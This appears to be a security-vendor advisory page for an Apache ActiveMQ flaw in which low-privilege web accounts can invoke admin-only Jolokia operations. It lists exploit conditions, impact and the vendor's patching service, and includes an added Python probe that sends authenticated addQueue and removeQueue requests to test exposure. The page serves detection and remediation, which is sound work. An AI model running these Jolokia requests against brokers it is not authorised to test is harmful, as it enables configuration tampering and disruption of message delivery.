HarborGuard Database

Severity: HIGH · CVE-2026-49157 · CNA: apache

CVE-2026-49157: Apache ActiveMQ: Authenticated low-privilege Web users retain Jolokia broker-management capability by default

Incorrect Default Permissions vulnerability in Apache ActiveMQ. This issue affects Apache ActiveMQ: before 5.19.7, from 6.0.0 before 6.2.6. The default Jolokia authorization settings granted non-admin (low-privilege) web-login accounts access to Jolokia operations which allowed executing broker management operations meant for admins such as addQueue and removeQueue. Users are recommended to upgrade to version 6.2.6 or 5.19.7, which fixes the issue.

Metrics

CVSS v3.1: 8.8
Severity: HIGH
Fixed in: 5.19.7 (5.x line), 6.2.6 (6.x line)
Affected Products: 1


HarborGuard Analysis

Synopsis

Incorrect default permissions in Apache ActiveMQ allow any authenticated low-privilege web user to access the Jolokia JMX-over-HTTP endpoint and invoke broker management operations reserved for administrators. The vulnerability is reachable over the network, requires only a low-privilege web-login account, and needs no interaction from any other user. A successful attacker can read sensitive broker state, modify queue configuration (adding or removing queues), and disrupt message delivery. A patched-image rebuild at version 5.19.7 or 6.2.6 is available on HarborGuard for affected environments.

HarborGuard Coverage

Detection: Available

Detection of CVE-2026-49157 is active across every HarborGuard environment: the CVE is ingested from the Apache and NVD feeds within minutes of publication and matched against all customer images, including custom-built ActiveMQ images, in both registry scans and CI pipeline checks.

Triage: Available

HarborGuard scores this CVE at CVSS 8.8 (HIGH) and can weight that score against each environment's compliance policy to prioritize routing; triage tickets are directed to the appropriate team inbox in each customer organization according to that policy configuration.

Patch: Available

A patched-image rebuild targeting ActiveMQ 5.19.7 or 6.2.6 becomes available in HarborGuard once the fix version is confirmed in the upstream advisory. For customers who opt into auto-remediation, HarborGuard can perform the rebuild, run regression tests, and open a pull request against affected workloads automatically.

Exploit Conditions

  • Network reachability: Required

    The Jolokia endpoint is exposed by the ActiveMQ web console over HTTP/HTTPS, so the attacker must be able to reach the console listener over the network.

  • Authentication: Required

    Any low-privilege web-login account is sufficient; no administrative credentials are needed to invoke the affected Jolokia operations.

  • Victim interaction: Not required

    The attacker sends HTTP requests directly to the Jolokia endpoint and needs no action from any other user.

  • Attack complexity: Low

    No special conditions are needed beyond network reach and valid low-privilege credentials; the attacker sends well-formed Jolokia requests (for example an exec of addQueue or removeQueue on the broker MBean) and the broker carries them out.
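The conditions above as an added probe (example code written for this page, not from the advisory, Apache ActiveMQ or HarborGuard): a Python script that authenticates with a low-privilege console account and checks whether the Jolokia endpoint still executes addQueue and removeQueue for it. It assumes the console at http://localhost:8161, the Jolokia servlet at /api/jolokia/, the default broker name localhost (so the broker MBean is org.apache.activemq:type=Broker,brokerName=localhost) and an arbitrary probe queue name; an Origin header is sent because ActiveMQ's shipped jolokia-access.xml enables Jolokia's strict CORS checking. The request builder and response classifier run offline; the network calls need a live broker.

```python
"""Probe whether a low-privilege ActiveMQ web account can run admin-only
broker operations through Jolokia (CVE-2026-49157).

Added example; not code from Apache ActiveMQ or HarborGuard.
"""
import base64
import json
import urllib.error
import urllib.request

# Assumed deployment values (not from the advisory): console URL, the
# default broker name, and an arbitrary throwaway queue used for the probe.
JOLOKIA_URL = "http://localhost:8161/api/jolokia/"
BROKER_MBEAN = "org.apache.activemq:type=Broker,brokerName=localhost"
PROBE_QUEUE = "cve-2026-49157-probe"


def exec_request(operation, *arguments, mbean=BROKER_MBEAN):
    """Jolokia 'exec' request body (POST JSON) for an MBean operation."""
    return {"type": "exec", "mbean": mbean, "operation": operation,
            "arguments": list(arguments)}


def read_request(attribute, mbean=BROKER_MBEAN):
    """Jolokia 'read' request body for an MBean attribute."""
    return {"type": "read", "mbean": mbean, "attribute": attribute}


def classify(http_status, body):
    """Map one reply to 'exposed', 'denied' or 'error'.

    A Jetty security constraint rejects before the servlet runs (HTTP
    401/403). Jolokia itself answers HTTP 200 and reports its own outcome
    in the JSON 'status' field: 200 on success, 403 when the access policy
    denies the call, 404/500 for missing MBeans and other failures.
    """
    if http_status in (401, 403):
        return "denied"
    if http_status != 200:
        return "error"
    try:
        reply = json.loads(body)
    except ValueError:
        return "error"
    status = reply.get("status")
    if status == 200:
        return "exposed"
    if status == 403:
        return "denied"
    return "error"


def send(request_body, user, password, url=JOLOKIA_URL, timeout=5):
    """POST one Jolokia request with HTTP Basic auth; return (status, body)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req = urllib.request.Request(
        url, data=json.dumps(request_body).encode(), method="POST",
        headers={"Content-Type": "application/json",
                 "Authorization": f"Basic {token}",
                 # strict CORS checking in jolokia-access.xml rejects
                 # requests that carry no Origin header
                 "Origin": "http://localhost"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode()


def check_low_privilege_account(user, password, url=JOLOKIA_URL):
    """Run the read and exec probes; return {probe: verdict}."""
    results = {}
    results["read Queues"] = classify(
        *send(read_request("Queues"), user, password, url))
    results["addQueue"] = classify(
        *send(exec_request("addQueue", PROBE_QUEUE), user, password, url))
    if results["addQueue"] == "exposed":
        # clean up the queue the probe just created
        results["removeQueue"] = classify(
            *send(exec_request("removeQueue", PROBE_QUEUE), user, password, url))
    return results


def is_affected(results):
    """True when a write operation succeeded for the low-privilege account."""
    return any(results.get(op) == "exposed" for op in ("addQueue", "removeQueue"))


if __name__ == "__main__":
    import sys
    outcome = check_low_privilege_account(sys.argv[1], sys.argv[2])
    for probe, verdict in outcome.items():
        print(f"{probe:12s} {verdict}")
    print("AFFECTED" if is_affected(outcome) else "not affected (exec denied)")
```

Run it as `python jolokia_probe.py <user> <password>` with an account that holds only the low-privilege web role. An "exposed" verdict for addQueue means the account retains admin-only broker management and the install is still affected; on a fixed release the exec calls should come back denied. The probe creates and immediately removes a throwaway queue, so pick a name that cannot collide with production destinations.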

Blast Radius

  • Reads broker internals exposed through Jolokia, including queue names, connection counts, and message metrics that may reveal sensitive operational data.
  • Adds or removes queues on the broker, disrupting application message flows that depend on those queues.
  • Invokes other broker management operations via Jolokia that are intended for administrators, enabling broad configuration tampering.
  • Degrades or disrupts broker availability by misusing management operations, for example by removing queues that live producers and consumers depend on or by creating them at scale.

How HarborGuard Handles This

Available on HarborGuard: detection for CVE-2026-49157 is active in every ingest cycle, matching images running Apache ActiveMQ versions prior to 5.19.7 (all prior releases) or prior to 6.2.6 (6.0.0 through 6.2.5). A patched-image rebuild at 5.19.7 or 6.2.6 is available for environments running an affected version. For customers who opt into auto-remediation, HarborGuard can rebuild the image, run a regression test suite, and open a pull request against affected workloads; median time from CVE publication to merged patch PR for HIGH-severity issues is around 90 minutes in environments with auto-remediation enabled. Where compliance policy requires manual approval, HarborGuard routes a prioritized triage ticket to the configured team inbox with full context on affected images and suggested remediation steps.


Fix available: 5.19.7, 6.2.6
Affected packages
  • Apache Software Foundation / Apache ActiveMQ
    < 5.19.7 (from 0) · < 6.2.6 (from 6.0.0)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H